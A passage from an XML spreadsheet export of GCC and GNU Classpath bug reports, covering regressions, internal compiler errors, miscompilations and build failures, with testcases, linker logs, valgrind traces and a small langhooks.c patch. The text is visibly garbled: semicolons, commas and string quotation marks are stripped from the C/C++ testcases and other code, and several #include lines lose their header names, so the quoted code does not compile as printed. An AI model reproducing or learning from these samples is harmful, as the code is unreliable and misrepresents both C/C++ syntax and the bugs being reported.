effectively leaking an address to local stack (D.16336 and D.16340)
to the caller.
To me this looks like a general language defect.
I have a DCE patch that will expose this issue even when inlining is in effect.</t>
  </si>
  <si>
    <t>GCC-49161</t>
  </si>
  <si>
    <t>[4.5 Regression] Fix VRP on switch stmts</t>
  </si>
  <si>
    <t>The following testcase is miscompiled at -O2 on x86_64/i686 starting with:
http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=155937
extern void abort (void)
int c
__attribute__((noinline noclone)) void
bar (int x)
{
  if (x != c++)
    abort ()
}
__attribute__((noinline noclone)) void
foo (int x)
{
  switch (x)
    {
    case 3: goto l1
    case 4: goto l2
    case 6: goto l3
    default: return
    }
l1:
  goto l4
l2:
  goto l4
l3:
  bar (-1)
l4:
  bar (0)
  if (x != 4)
    bar (1)
  if (x != 3)
    bar (-1)
  bar (2)
}
int
main ()
{
  foo (3)
  if (c != 3)
    abort ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-62167</t>
  </si>
  <si>
    <t>[4.8 Regression][tail-merge] dead type-unsafe load replaces type-safe load</t>
  </si>
  <si>
    <t>The example from PR62004 fails with -ftree-tail-merge. The PR62004 report is reserved for the rtl if-conversion part this report is reserved for the tail-merge part.</t>
  </si>
  <si>
    <t>GCC-12160</t>
  </si>
  <si>
    <t>[3.4 regression] confusing error message with invalid function declaration</t>
  </si>
  <si>
    <t>This is totally useless: 
----------------------------------- 
struct X { 
    virtual void f(int 
		   itn        // typo 
		   int) 
} 
----------------------------------- 
&gt;&gt; ~/bin/gcc-3.3/bin/c++ -c x.cc 
x.cc:3: error: type specifier omitted for parameter `itn' 
&gt;&gt; ~/bin/gcc-3.4/c++ -c x.cc 
x.cc:2: error: variable or field `f' declared void 
x.cc:2: error: `f' declared as a `virtual' field 
x.cc:2: error: expected function-definition 
The error message is completely unreadable and doesn't reveal where the problem 
really is. It doesn't say which parameter is misspelled and if the parameter list 
is long and contains lots of templates and incomplete types it doesn't help to 
to fix the problem. 
I rate this as a regression. 
W.</t>
  </si>
  <si>
    <t>CLASSPATH-27839</t>
  </si>
  <si>
    <t>BufferedImage.TYPE_INT_BGR not supported</t>
  </si>
  <si>
    <t>See attached testcase for a class that tries to use BufferedImage with
TYPE_INT_BGR because this way it was easier to convert the original C-style
data to actual image data for Java painting.
Exception during event dispatch:
java.lang.UnsupportedOperationException: FIXME: Programmer is confused. Why (and how) does a TYPE_INT_BGR image use ComponentColorModel to store 8-bit values? Is data type TYPE_INT or TYPE_BYTE. What is the difference between TYPE_INT_BGR and TYPE_3BYTE_BGR?
   at java.awt.image.BufferedImage.(BufferedImage.java:160)
   ...
I looked at the source for BufferedImage.java and I guess it is sufficient 
to just remove the FIXME and fall through to the case for TYPE_3BYTE_BGR 
and add another case to set the bits3 mask.
I tried that but the application then segfaults under jamvm trying to
dereference a null array. However the same segfault occurs when I change
my testcase to use TYPE_3BYTE_BGR or TYPE_4BYTE_BGR - see next bug report.
- Norman</t>
  </si>
  <si>
    <t>GCC-58014</t>
  </si>
  <si>
    <t>vshuf-v2si.C fails at -O3 on hppa64</t>
  </si>
  <si>
    <t>FAIL: g++.dg/torture/vshuf-v2sf.C  -O3 -fomit-frame-pointer  execution test
FAIL: g++.dg/torture/vshuf-v2sf.C  -O3 -g  execution test
FAIL: g++.dg/torture/vshuf-v2si.C  -O3 -fomit-frame-pointer  execution test
FAIL: g++.dg/torture/vshuf-v2si.C  -O3 -g  execution test
Introduced between 197667 and 198496.</t>
  </si>
  <si>
    <t>GCC-29686</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE when expanding recursive function containing switch</t>
  </si>
  <si>
    <t>when cross-compiling the kernel for ARM with gcc-4.1.1 we hit an ICE:
include/asm/arch/io.h: In function 'imu_dev_init':
include/asm/arch/io.h:43: internal compiler error: Segmentation fault
checked on a Gentoo ppc/x86_64 host for the arm target with gcc-3.4.6 and
gcc-4.1.1 and gcc-4.1-20061027 gcc-4.2-20061014 ... only the 4.1.x versions failed</t>
  </si>
  <si>
    <t>GCC-48769</t>
  </si>
  <si>
    <t>[4.7 Regression] Multiple failures in libjava for -m64 on powerpc-apple-darwin9</t>
  </si>
  <si>
    <t>Between revisions 172592 and 172898 multiple failures appeared in libjava for -m64 on powerpc-apple-darwin9 (see http://gcc.gnu.org/ml/gcc-testresults/2011-04/msg02373.html). My G5 will be down for at least the next two weeks and I'll be out of town for this period of time so I'll unable to do further testing before mid May.</t>
  </si>
  <si>
    <t>GCC-3133</t>
  </si>
  <si>
    <t>Invalid loader fixup for symbol __objc_class_name_Object</t>
  </si>
  <si>
    <t>The following error occurs linking objc programs with a
shared libobjc:
Executing on host: /xxx/gnu/gcc-3.0/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.0/objdir/gcc/ /xxx/gnu/gcc-3.0/gcc/testsuite/objc/execute/accessing_ivars.m  -w  -O  -I/xxx/gnu/gcc-3.0/gcc/testsuite/../../libobjc -L/xxx/gnu/gcc-3.0/objdir/hppa1.1-hp-hpux10.20/libobjc/.libs  -lobjc -lm   -o /xxx/gnu/gcc-3.0/objdir/gcc/testsuite/accessing_ivars.x    (timeout = 300)
/usr/ccs/bin/ld: Invalid loader fixup for symbol __objc_class_name_Object.
collect2: ld returned 1 exit status
compiler exited with status 1
Release:
gcc 3.0 prerelease
Environment:
hpux 10.20
How-To-Repeat:
Link any objc program with shared libobjc under hpux 10.20.</t>
  </si>
  <si>
    <t>GCC-46533</t>
  </si>
  <si>
    <t>[alpha] bootstrap failure</t>
  </si>
  <si>
    <t>$ gcc/xgcc -v
Using built-in specs.
COLLECT_GCC=gcc/xgcc
Target: alphaev68-unknown-linux-gnu
Configured with: ../gcc-svn/trunk/configure --enable-languages=cc++fortran
Thread model: posix
gcc version 4.6.0 20101117 (experimental) [trunk revision 166859] (GCC) 
...
/home/uros/gcc-build/./prev-gcc/xgcc -B/home/uros/gcc-build/./prev-gcc/ -B/usr/local/alphaev68-unknown-linux-gnu/bin/ -B/usr/local/alphaev68-unknown-linux-gnu/bin/ -B/usr/local/alphaev68-unknown-linux-gnu/lib/ -isystem /usr/local/alphaev68-unknown-linux-gnu/include -isystem /usr/local/alphaev68-unknown-linux-gnu/sys-include      -g -O2 -gtoggle -DIN_GCC   -W -Wall -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H  -o cc1plus \
	      cp/cp-lang.o c-family/stub-objc.o cp/call.o cp/decl.o cp/expr.o cp/pt.o cp/typeck2.o cp/class.o cp/decl2.o cp/error.o cp/lex.o cp/parser.o cp/ptree.o cp/rtti.o cp/typeck.o cp/cvt.o cp/except.o cp/friend.o cp/init.o cp/method.o cp/search.o cp/semantics.o cp/tree.o cp/repo.o cp/dump.o cp/optimize.o cp/mangle.o cp/cp-objcp-common.o cp/name-lookup.o cp/cxx-pretty-print.o cp/cp-gimplify.o tree-mudflap.o attribs.o incpath.o prefix.o c-family/c-common.o c-family/c-cppbuiltin.o c-family/c-dump.o c-family/c-format.o c-family/c-gimplify.o c-family/c-lex.o c-family/c-omp.o c-family/c-opts.o c-family/c-pch.o c-family/c-ppoutput.o c-family/c-pragma.o c-family/c-pretty-print.o c-family/c-semantics.o c-family/c-ada-spec.o  cc1plus-checksum.o main.o tree-browser.o libbackend.a ../libcpp/libcpp.a ../libdecnumber/libdecnumber.a ../libcpp/libcpp.a   ../libiberty/libiberty.a ../libdecnumber/libdecnumber.a  -lcloog -lppl_c -lppl -lgmpxx -lmpc -lmpfr -lgmp -rdynamic -ldl  -L../zlib -lz
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xe7ac): relocation truncated to fit: BRADDR against `.text.unlikely'
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xeb28): relocation truncated to fit: BRADDR against `.text.unlikely'
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xeb6c): relocation truncated to fit: BRADDR against `.text.unlikely'
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xeca4): relocation truncated to fit: BRADDR against `.text.unlikely'
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xecf0): relocation truncated to fit: BRADDR against `.text.unlikely'
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xed5c): relocation truncated to fit: BRADDR against `.text.unlikely'
libbackend.a(gimple.o): In function `gimple_types_compatible_p_1':
(.text+0xf238): relocation truncated to fit: BRADDR against `.text.unlikely'
collect2: ld returned 1 exit status
gmake[3]: *** [cc1plus] Error 1
gmake[3]: Leaving directory `/space/uros/gcc-build/gcc'
gmake[2]: *** [all-stage2-gcc] Error 2
gmake[2]: Leaving directory `/space/uros/gcc-build'
gmake[1]: *** [stage2-bubble] Error 2
gmake[1]: Leaving directory `/space/uros/gcc-build'
gmake: *** [all] Error 2</t>
  </si>
  <si>
    <t>GCC-29719</t>
  </si>
  <si>
    <t>newlib targets ICEs in expand_builtin_int_roundingfn</t>
  </si>
  <si>
    <t>On newlib targets the compiler fails to compile
long testlf (float x)
{
  return __builtin_lceilf (x)
}
with the error
internal compiler error: in expand_builtin_int_roundingfn at builtins.c:2298</t>
  </si>
  <si>
    <t>GCC-27793</t>
  </si>
  <si>
    <t>[4.1 Regression] num_ssa_names inconsistent or immediate use iterator wrong</t>
  </si>
  <si>
    <t>The testcase I'll attach momentarily segfaults/ICEs at random places for a checking enabled 4.1.1 compiler.  Valgrind has more useful information as
==31272== Invalid read of size 4
==31272==    at 0x82AC3C3: verify_ssa (tree-ssa.c:746)
==31272==    by 0x8731ED8: execute_todo (passes.c:761)
...
==31272==  Address 0x456FA58 is 8 bytes after a block of size 120 alloc'd
==31272==    at 0x402064B: calloc (in /usr/lib/valgrind/x86-linux/vgpreload_memcheck.so)
==31272==    by 0x88D0817: xcalloc (xmalloc.c:162)
==31272==    by 0x82ABA7F: verify_ssa (tree-ssa.c:637)
which means we access definition_block[SSA_NAME_VERSION (op)] with
SSA_NAME_VERSION (op) &gt;= num_ssa_names.  Attaching with gdb at this point
also shows op being corrupt (0x433230c) so it may be well the iterator
being bogus.
It's hard to reduce the testcase further as it is very sensitive to number
of ssa names and allocation profile.</t>
  </si>
  <si>
    <t>GCC-39742</t>
  </si>
  <si>
    <t>[4.5 Regression] ice in C++ overload resolution</t>
  </si>
  <si>
    <t>I just tried to compile the following code
void f( int ...)
struct S
{
}
void
g()
{
        void f( int ...)
        S t
        f( 1 t)
}
void
f( int i ...)
{
}
with GNU C compiler version 4.5 snapshot 20090409
and the compiler said
jul17c.cc: In function 'void g()':
jul17c.cc:15: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This C++ source code used to work with the 20090402 snapshot.
Here is valgrind helping out with a stack backtrace
Invalid read of size 8
==15025==    at 0x40791E: joust (call.c:6802)
==15025==    by 0x4080DA: tourney (call.c:6896)
==15025==    by 0x40BCF3: perform_overload_resolution (call.c:2979)
==15025==    by 0x416AE5: build_new_function_call (call.c:3019)
==15025==    by 0x50B4EF: finish_call_expr (semantics.c:1994)
==15025==    by 0x4BBEB3: cp_parser_postfix_expression (parser.c:4825)
==15025==    by 0x4BC7B3: cp_parser_unary_expression (parser.c:5577)
==15025==    by 0x4BD08C: cp_parser_binary_expression (parser.c:6233)
==15025==    by 0x4BD473: cp_parser_assignment_expression (parser.c:6421)
==15025==    by 0x4BD89F: cp_parser_expression (parser.c:6566)
==15025==    by 0x4BDC33: cp_parser_expression_statement (parser.c:7129)
==15025==    by 0x4B684A: cp_parser_statement (parser.c:7019)
==15025==  Address 0x10 is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-21144</t>
  </si>
  <si>
    <t>[4.0/4.1 regression] Apparent infinite loop in reload</t>
  </si>
  <si>
    <t>The testcase appears to hang inside reload_cse_regs when compiled with -O2.</t>
  </si>
  <si>
    <t>GCC-52294</t>
  </si>
  <si>
    <t>[4.7 Regression] [ARM Thumb] generated asm code produces branch out of range error in gas with -Os -mcpu=cortex-a9</t>
  </si>
  <si>
    <t>Created attachment 26693
Preprocessed source triggering this issue
[bero@localhost ~]$ /opt/android-toolchain-4.7/bin/arm-linux-androideabi-g++ -mcpu=cortex-a9 -mthumb -Os -o agc2_amr_wb.o -c agc2_amr_wb.i 
/tmp/ccBg0Qr8.s: Assembler messages:
/tmp/ccBg0Qr8.s:110: Error: branch out of range
The problem disappears when taking out -mcpu=cortex-a9 or replacing -Os with any other optimization level.
Reproducable with arm-linux-androideabi arm-eabi and arm-linux-gnueabi compilers.</t>
  </si>
  <si>
    <t>GCC-16015</t>
  </si>
  <si>
    <t>[4.0 Regression] xfailed g++.dg/ext/stmtexpr1.C</t>
  </si>
  <si>
    <t>This test is now xfailed on mainline because 
  ({A  () A () }).Foo () A ()
no longer works as expected.  I'm unclear on how this ever worked since a 
related test case (to be attached) doesn't pass on any version of gcc.
Jason said he'd poke at the problem.</t>
  </si>
  <si>
    <t>GCC-3372</t>
  </si>
  <si>
    <t>v850-elf fails to compile on gcc 3.0 CVS branch</t>
  </si>
  <si>
    <t>../gcc/configure --target=v850-elf --with-gnu-as --with-gnu-ld --with-newlib --verbose --prefix=/usr1/tmp-tools --enable-languages=cc++ &amp;&amp; make
fails with this error:
/usr3/ftp_archive/gnu/gcc/ss/b3/b-v850-elf/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-v850-elf/gcc/ -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b3/b-v850-elf/v850-elf/newlib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/b-v850-elf/v850-elf/newlib/targ-include -isystem /usr3/ftp_archive/gnu/gcc/ss/b3/gcc/newlib/libc/include -B/usr1/tmp-tools/v850-elf/bin/ -B/usr1/tmp-tools/v850-elf/lib/ -isystem /usr1/tmp-tools/v850-elf/include -DPACKAGE=\newlib\ -DVERSION=\1.9.0\  -I. -I../../../../../gcc/newlib/libc/stdlib  -O2 -DPREFER_SIZE_OVER_SPEED -mv850 -I../../targ-include -I../../../../../gcc/newlib/libc/../libc/include -fno-builtin      -g -O2 -c ../../../../../gcc/newlib/libc/stdlib/assert.c
/tmp/ccNDyOEt.s: Assembler messages:
/tmp/ccNDyOEt.s:130: Error: undefined symbol _ in operation
/tmp/ccNDyOEt.s:130: Error: undefined symbol _impure_ptr in operation
Release:
gcc 3.0 CVS branch
Environment:
GNU/Linux RedHat 6.2 targetting v850-elf
How-To-Repeat:
configure and build per description.
I used binutils 2.10 and newlib 1.9.0</t>
  </si>
  <si>
    <t>GCC-39214</t>
  </si>
  <si>
    <t>I have an internal compiler error: Segmentation fault
with gcc trunk (rev. 144201). 
In a huge example it occurs in line 440 of gcc/langhooks.c that
'block' is NULL and that causes this SegFault in 'TREE_CODE (block)'.
Instead of shrinking this huge example down I propose following
patch. Can somebody with write access can commit this for me?
Index: gcc/langhooks.c
===================================================================
--- gcc/langhooks.c	(revision 144201)
+++ gcc/langhooks.c	(working copy)
@@ -4377 +4377 @@
 		  while (block &amp;&amp; TREE_CODE (block) == BLOCK)
 		    block = BLOCK_SUPERCONTEXT (block)
-		  if (TREE_CODE (block) == FUNCTION_DECL)
+		  if (block &amp;&amp; TREE_CODE (block) == FUNCTION_DECL)
 		    fndecl = block
 		  abstract_origin = NULL
 		}</t>
  </si>
  <si>
    <t>GCC-41435</t>
  </si>
  <si>
    <t>GCC doesn't fold complex int division</t>
  </si>
  <si>
    <t>For integral complex types like complex int GCC doesn't fold division with constant arguments.  E.g. this testcase should evaluate at compile-time and link without any errors but doesn't:
extern void link_error(void)
#define EXPR ((2 + 4i) / 2)
int main(void)
{
  if (__real EXPR != 1 || __imag EXPR != 2)
    link_error()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-40444</t>
  </si>
  <si>
    <t>[4.5 Regression] libffi badly broken with -m64 by some revision between 148383 and 148472.</t>
  </si>
  <si>
    <t>See comment #4 of pr40385:
                === libffi Summary for unix ===
# of expected passes            1594
# of expected failures          10
# of unsupported tests          15
Running target unix/-m64
FAIL: libffi.call/closure_fn0.c -O0 -W -Wall execution test
...
FAIL: libffi.special/unwindtest.cc  -shared-libgcc -lstdc++ execution test
                === libffi Summary for unix/-m64 ===
# of expected passes            776
# of unexpected failures        409
# of expected failures          10
# of unsupported tests          15
                === libffi Summary ===
# of expected passes            2370
# of unexpected failures        409
# of expected failures          20
# of unsupported tests          30
I have had a look at some crash reports. They look as:
[ibook-dhum] gcc/_gcc_clean% cat ~/Library/Logs/CrashReporter/closure_fn0.exe_2009-06-15-074300_ibook-dhum.crash
Process:         closure_fn0.exe [67697]
Path:            ./closure_fn0.exe
Identifier:      closure_fn0.exe
Version:         ??? (???)
Code Type:       X86-64 (Native)
Parent Process:  expect [60005]
Date/Time:       2009-06-15 07:43:00.456 +0200
OS Version:      Mac OS X 10.5.7 (9J61)
Report Version:  6
Anonymous UUID:  E80146C8-66E0-457D-87E0-4A904418933C
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000100100210
Crashed Thread:  0
Thread 0 Crashed:
0   ???                           	0x0000000100100210 0 + 4296016400
1   closure_fn0.exe               	0x00000001000009f4 start + 52
Thread 0 crashed with X86 Thread State (64-bit):
  rax: 0x0000000100100210  rbx: 0x00007fff5fbf8c60  rcx: 0x0000000000000004  rdx: 0x0000000000000003
  rdi: 0x0000000000000001  rsi: 0x0000000000000002  rbp: 0x00007fff5fbf8ca0  rsp: 0x00007fff5fbf8b88
   r8: 0x000000000000007f   r9: 0x00000000000001ad  r10: 0x0000000100002150  r11: 0x0000000100004f20
  r12: 0x0000000000000000  r13: 0x0000000000000000  r14: 0x0000000000000000  r15: 0x0000000000000000
  rip: 0x0000000100100210  rfl: 0x0000000000010246  cr2: 0x0000000100100210
Binary Images:
       0x100000000 -        0x100000fff +closure_fn0.exe ??? (???)  /Volumes/MacBook/opt/gcc/i686-darwin/i686-apple-darwin9/libffi/testsuite/closure_fn0.exe
       0x100003000 -        0x100005ff7 +libffi.4.dylib ??? (???)  /opt/gcc/i686-darwin/i686-apple-darwin9/x86_64/libffi/.libs/libffi.4.dylib
       0x10000a000 -        0x10001eff1 +libgcc_s.1.dylib ??? (???)  /opt/gcc/i686-darwin/gcc/libgcc_s.1.dylib
    0x7fff5fc00000 -     0x7fff5fc2e643  dyld 97.1 (???)  /usr/lib/dyld
    0x7fff82d7e000 -     0x7fff82f09ffb  libSystem.B.dylib ??? (???)  /usr/lib/libSystem.B.dylib
    0x7fff83fe2000 -     0x7fff83fe6fff  libmathCommon.A.dylib ??? (???) /usr/lib/system/libmathCommon.A.dylib
    0x7fffffe00000 -     0x7fffffe01780  libSystem.B.dylib ??? (???) /usr/lib/libSystem.B.dylib</t>
  </si>
  <si>
    <t>GCC-53457</t>
  </si>
  <si>
    <t>Accommodate non-compliant ioctl() on VxWorks</t>
  </si>
  <si>
    <t>Created attachment 27480
Patch
On VxWorks ioctl()'s third argument is of type int so this added
macro wraps over ioctl to cast the third argument to an integer.
This *cannot* be in config/os/vxworks/os_defines.h as otherwise
the function prototype will trigger the macro and it will be ugly.
Alternate solution is to #ifdef at the call site.
Attached patch is against trunk.  Without it the compile fails because VxWorks ioctl() requires third argument to be of type int and C++ doesn't allow implicit conversion from pointer to integer.</t>
  </si>
  <si>
    <t>rbmj</t>
  </si>
  <si>
    <t>GCC-19410</t>
  </si>
  <si>
    <t>Overlapping memcpy with big struct copies</t>
  </si>
  <si>
    <t>RUN c64106a 
==4601== Memcheck a memory error detector for x86-linux. 
==4601== Copyright (C) 2002-2004 and GNU GPL'd by Julian Seward et al. 
==4601== Using valgrind-2.3.0.CVS a program supervision framework for 
x86-linux. 
==4601== Copyright (C) 2000-2004 and GNU GPL'd by Julian Seward et al. 
==4601== For more details rerun with: -v 
==4601== 
.. C64106A ACATS 2.5 05-01-11 16:41:51 
---- C64106A CHECK USE OF ACTUAL CONSTRAINTS BY UNCONSTRAINED FORMAL 
                PARAMETERS. 
==4601== Source and destination overlap in memcpy(0x52BFC6EC 0x52BFC6EC 28) 
==4601==    at 0x1B906AC5: memcpy (mac_replace_strmem.c:113) 
==4601==    by 0x805B772: _ada_c64106a (c64106a.adb:88) 
==4601==    by 0x8049DFC: main (b~c64106a.adb:149) 
==4601== 
==4601== Source and destination overlap in memcpy(0x52BFC664 0x52BFC664 28) 
==4601==    at 0x1B906AC5: memcpy (mac_replace_strmem.c:113) 
==4601==    by 0x805BB4C: _ada_c64106a (c64106a.adb:235) 
==4601==    by 0x8049DFC: main (b~c64106a.adb:149) 
==== C64106A PASSED ============================. 
==4601== 
==4601== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 13 from 1) 
==4601== malloc/free: in use at exit: 10280 bytes in 2 blocks. 
==4601== malloc/free: 12 allocs 10 frees 11810 bytes allocated. 
==4601== For a detailed leak analysis  rerun with: --leak-check=yes 
==4601== For counts of detected errors rerun with: -v 
PASS:   c64106a</t>
  </si>
  <si>
    <t>GCC-52886</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gcc.dg/torture/pr36978.c  -On  (internal compiler error) n=1 and above</t>
  </si>
  <si>
    <t>Between revisions 186092 (OK see http://gcc.gnu.org/ml/gcc-testresults/2012-04/msg00234.html) and 186108 (see http://gcc.gnu.org/ml/gcc-testresults/2012-04/msg00277.html) compiling gcc.dg/torture/pr36978.c on powerpc*-*-* and s390-ibm-linux-gnu has stated to give an ICE:
FAIL: gcc.dg/torture/pr36978.c  -O1  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O1  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O2  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O2  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O3 -fomit-frame-pointer  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O3 -fomit-frame-pointer -funroll-loops  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O3 -g  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O3 -g  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O2 -flto -flto-partition=none  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O2 -flto -flto-partition=none  (test for excess errors)
FAIL: gcc.dg/torture/pr36978.c  -O2 -flto  (internal compiler error)
FAIL: gcc.dg/torture/pr36978.c  -O2 -flto  (test for excess errors)
The ICE is
[karma] f90/bug% gcc48 -O1 /opt/gcc/work/gcc/testsuite/gcc.dg/torture/pr36978.c
/opt/gcc/work/gcc/testsuite/gcc.dg/torture/pr36978.c: In function 'foo':
/opt/gcc/work/gcc/testsuite/gcc.dg/torture/pr36978.c:5:6: error: AUX pointer initialized for edge 3-&gt;4
/opt/gcc/work/gcc/testsuite/gcc.dg/torture/pr36978.c:5:6: internal compiler error: verify_ssa failed</t>
  </si>
  <si>
    <t>GCC-58609</t>
  </si>
  <si>
    <t>[4.9 Regression] [c++11] ICE with uninitialized variable in constexpr</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11) triggers an ICE on trunk (since at least GCC 4.9.0 20130920):
===================================
struct A
{
  static constexpr int
}
int j = A::i
===================================
bug.cc:3:30: error: non-constant in-class initialization invalid for static member 'A::i'
   static constexpr int
                              ^
bug.cc:3:30: error: (an out of class initialization is required)
cc1plus: internal compiler error: in record_reference at cgraphbuild.c:66
0x7ff843 record_reference
        ../../gcc/gcc/cgraphbuild.c:66
0xcf44ab walk_tree_1(tree_node** tree_node* (*)(tree_node** int* void*) void* pointer_set_t* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* pointer_set_t*))
        ../../gcc/gcc/tree.c:10928
0xcf48e5 walk_tree_1(tree_node** tree_node* (*)(tree_node** int* void*) void* pointer_set_t* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* pointer_set_t*))
        ../../gcc/gcc/tree.c:11191
0x8001fd record_references_in_initializer(tree_node* bool)
        ../../gcc/gcc/cgraphbuild.c:427
0xd2ce67 varpool_analyze_node(varpool_node*)
        ../../gcc/gcc/varpool.c:398
0x804147 analyze_functions
        ../../gcc/gcc/cgraphunit.c:1035
0x805669 finalize_compilation_unit()
        ../../gcc/gcc/cgraphunit.c:2260
0x6188a0 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4360
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-293</t>
  </si>
  <si>
    <t>-fomit-frame-pointer breaks correct exception handling</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Thu 08 Jun 2000 16:54:40 -0400
 Original-Message-ID: 
 This is either a bug in the implementation or a bug in the documentation.
 i.e. if the implementation of exceptions _requires_ the frame pointer I would
 propose that the gcc documentation include a warning to that effect.
 $ g++ -v &amp;&amp; cat b2.cc
 Reading specs from /usr/local/libexec/gcc-latest-snapshot/bin/../lib/gcc-lib/i686-pc-linux/2.96/specs
 gcc version 2.96 20000605 (experimental)
 #include 
 struct cow_t {
   cow_t()  { cout &lt;&lt;created a cow\n }
   ~cow_t() { cout &lt;&lt;destroyed a cow\n }
 }
 struct error_t { }
 void func2()
 {
   throw error_t()
 }
 void func1()
 {
   cow_t cow
   func2()
 }
 int main()
 {
   try {
     func1()
   }
   catch(...) {
     cout &lt;&lt;caught an exception\n
   }
 }
 $ g++ b2.cc &amp;&amp; a.out
 created a cow
 destroyed a cow
 caught an exception
 $ g++ -fomit-frame-pointer b2.cc &amp;&amp; a.out
 created a cow
 caught an exception
 [note that the cow is not destroyed in the latter case]
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-9415</t>
  </si>
  <si>
    <t>[3.4 regression] can't call base class's virtual function</t>
  </si>
  <si>
    <t>In the program below the call to d0_Object::activate() does not call
the method requested.  Instead it does a virtual call to activate() ---
meaning that this program when run goes into an infinite recursion.
If i change it so that d0_DBObject is not a template class then the
program behaves as expected.
$ g++ -o x x.cc
$ ./x
act
act
act
act
act
act
act
... and so on ...
Release:
3.4 20030121 (experimental)
Environment:
System: Linux karma 2.4.19-emp_2419p5a829i #1 Tue Sep 3 17:42:17 EST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/usr/local/gcc --enable-threads=posix --enable-long-long
How-To-Repeat:
----------------------
extern C int printf (...)
struct d0_Object
{
  virtual void activate() {}
}
template 
struct d0_DBObject : public d0_Object
{
  void activate() { printf (act\n) d0_Object::activate()}
}
int main ()
{
  d0_DBObject x
  x.activate()
  return 0
}
----------------------</t>
  </si>
  <si>
    <t>GCC-1011</t>
  </si>
  <si>
    <t>__VA_ARGS__ warning in #if-ed out code</t>
  </si>
  <si>
    <t>GCC complains about __VA_ARGS__ in #if-ed out code
even in C99 mode.
In C89 mode:
han ~/z/z &gt; gcc -c -std=c89 test.c
test.c:2:20: warning: __VA_ARGS__ can only appear in the expansion of a C99 variable-argument macro
test.c:6:20: warning: __VA_ARGS__ can only appear in the expansion of a C99 variable-argument macro
and in C99 mode:
han ~/z/z &gt; gcc -c -std=c99 test.c
test.c:2:20: warning: __VA_ARGS__ can only appear in the expansion of a C99 variable-argument macro
Line 2 is enclosed in a  #if 0...#endif and Line 6 is
enclosed in
  #if defined __STDC_VERSION__ &amp;&amp; __STDC__VERSION &gt;= 199901L
  ...
  #endif
Release:
unknown
Environment:
i686-pc-linux-gnu
gcc version 2.97 20001205 (experimental)</t>
  </si>
  <si>
    <t>GCC-2592</t>
  </si>
  <si>
    <t>variable expression erroneously allowed to dimension array</t>
  </si>
  <si>
    <t>An automatic array is erroneously allowed to be dimensioned by a variable expression. This is an ansi violation and highly nonportable to other ansi compilers.
Release:
gcc version 2.8.1
Environment:
AIX 4.2 also is accepted by CodeSorcery
/marces/gnu/lib/gcc-lib/powerpc-ibm-aix4.2.1.0/2.8.1/specs
How-To-Repeat:
gcc -Wall -ansi
int printf( char * ... ) 
int i=1 
int main()
{
        char buff[i]  /* variable expression allowed to dimension array */ 
        buff[0] = 'f' 
        buff[1] = 'o' 
        buff[2] = 'o' 
        buff[3] = '\0' 
        return printf(  %s %d\n buff sizeof(buff) ) 
}</t>
  </si>
  <si>
    <t>allen.everhart</t>
  </si>
  <si>
    <t>GCC-7844</t>
  </si>
  <si>
    <t>Function declarations parsed incorrectly</t>
  </si>
  <si>
    <t xml:space="preserve">	Ambiguity in function declarations is resolved incorrectly.
	See ISO/IEC 14882:1998(E) 8.2 p7
Release:
3.3 20020905 (experimental)
Environment:
System: FreeBSD arcturus.student.iastate.edu 4.6-STABLE FreeBSD 4.6-STABLE #15: Sat Aug 24 23:25:48 CDT 2002 kparz@arcturus.student.iastate.edu:/usr/obj/usr/src/sys/ARCTURUS i386
host: i386-unknown-freebsd4.6
build: i386-unknown-freebsd4.6
target: i386-unknown-freebsd4.6
configured with: ../gcc/configure --prefix=/u/gcc-20020905 --enable-languages=cc++f77
How-To-Repeat:
# 1 parse.cc
# 1 
# 1 
# 1 parse.cc
typedef int I
